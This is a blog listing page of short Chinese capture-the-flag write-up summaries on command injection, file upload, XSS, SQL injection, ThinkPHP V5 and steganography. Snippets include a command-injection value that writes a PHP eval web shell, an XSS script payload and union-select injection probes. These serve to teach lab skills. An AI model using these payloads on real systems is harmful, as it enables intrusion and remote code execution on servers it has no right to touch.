摘要: RCE-0 https://blog.csdn.net/weixin_48799157/article/details/123800145在这里输入127.0.0.1&echo -e "<?php @eval(\$_POST['test']);?>" > 555.php创建文件555.php并输入一 阅读全文
posted @ 2023-10-24 00:28 BUGCATCAPOO 阅读(70) 评论(0) 推荐(0) 编辑
摘要: 目录遍历 参考博客: CTFHub技能树 Web-信息泄露 详解_bugscanteam_ErYao7的博客-CSDN博客 emmm,几个目录都点一点 PHPinfo 在phpinfo中直接查看flag,找不到就CTRL+F搜索 备份文件下载 网站源码 当开发人员在线上环境中对源代码进行了备份操作, 阅读全文
posted @ 2023-10-24 00:28 BUGCATCAPOO 阅读(120) 评论(0) 推荐(0) 编辑
摘要: 御林 [Hard-]是的,这是一份礼物 信息中心 阅读全文
posted @ 2023-10-24 00:27 BUGCATCAPOO 阅读(56) 评论(0) 推荐(0) 编辑
摘要: 只做了第一个其他的不会(挨打 best language (Think PHP V5) think php V5 攻防世界这道题,考察的是thinkphp V5的漏洞,接下来我详细介绍一下thinkphp V5这个漏洞。 ThinkPHP 5漏洞简介ThinkPHP官方2018年12月9日发布重要的 阅读全文
posted @ 2023-10-24 00:26 BUGCATCAPOO 阅读(38) 评论(0) 推荐(0) 编辑
摘要: 这个题以我的水平应该只够恢复图片,好吧恢复图片也不一定搞得来 恢复图片 16进制打开文件在文件末尾有一段python代码 复制到一个新建py文件中 缺少PIL库 在windows环境下安装PIL(也可以叫做Pillow)_windows下载pillow-CSDN博客 虽然我下载到那个文件了但是我还是 阅读全文
posted @ 2023-10-24 00:26 BUGCATCAPOO 阅读(45) 评论(0) 推荐(0) 编辑
摘要: 绝对音感 观察波形频谱没什么信息,ultraEdit打开发现文件尾部有信息,这里的思路来源于之前图片马的文件合并 Cltr+F直接找第一个Y字符 Yulinsec{} 阅读全文
posted @ 2023-10-24 00:25 BUGCATCAPOO 阅读(51) 评论(0) 推荐(0) 编辑
摘要: 感谢sake大佬不厌其烦的教我,在过程中大佬一直很温柔很耐心呜呜呜 HTTP content-type | 菜鸟教程 (runoob.com) LFI-6 首先确定是文件上传漏洞,大致思路为上传jpg格式或者zip格式文件的一句话木马然后antsword连接进入后台 记事本写一个重命名就好,这里直接 阅读全文
posted @ 2023-10-24 00:25 BUGCATCAPOO 阅读(155) 评论(0) 推荐(1) 编辑
摘要: XSS过滤绕过速查表_xss速查表-CSDN博客 XSS-1 第一步查看链接,题目查看网页源码有hidden的东西参数不要在链接后面拼接/?a=,用?a= ?name=<script>alert(1)</script> XSS2 错误判断 页面源代码会被编码从而无法解析 尖括号被编码可以试试属性xs 阅读全文
posted @ 2023-10-24 00:24 BUGCATCAPOO 阅读(98) 评论(0) 推荐(0) 编辑
摘要: ENCODE 百度一下各种编码很容易找到特征的 HTTP 将网页在代理中请求拦截到重放repeater 网站后缀添加/?key1=YulinSec即以get方式发送key1=YulinSec 第二步 post参数传递key2=YulinSec 使用POST提交方法和GET类似,将GET改为POST, 阅读全文
posted @ 2023-10-24 00:24 BUGCATCAPOO 阅读(465) 评论(0) 推荐(0) 编辑
摘要: ctfhub_web_SQL注入_全通关详解(持续更新中) - FreeBuf网络安全行业门户 整数注入 输入1,回显用户 输入1 order 2 正常 输入1 order 3 错误,说明字段数为2 输入-1 union select 1,2 或者构造链接/?id=-1%20union%20sele 阅读全文
posted @ 2023-10-24 00:22 BUGCATCAPOO 阅读(57) 评论(0) 推荐(0) 编辑
点击右上角即可分享
微信分享提示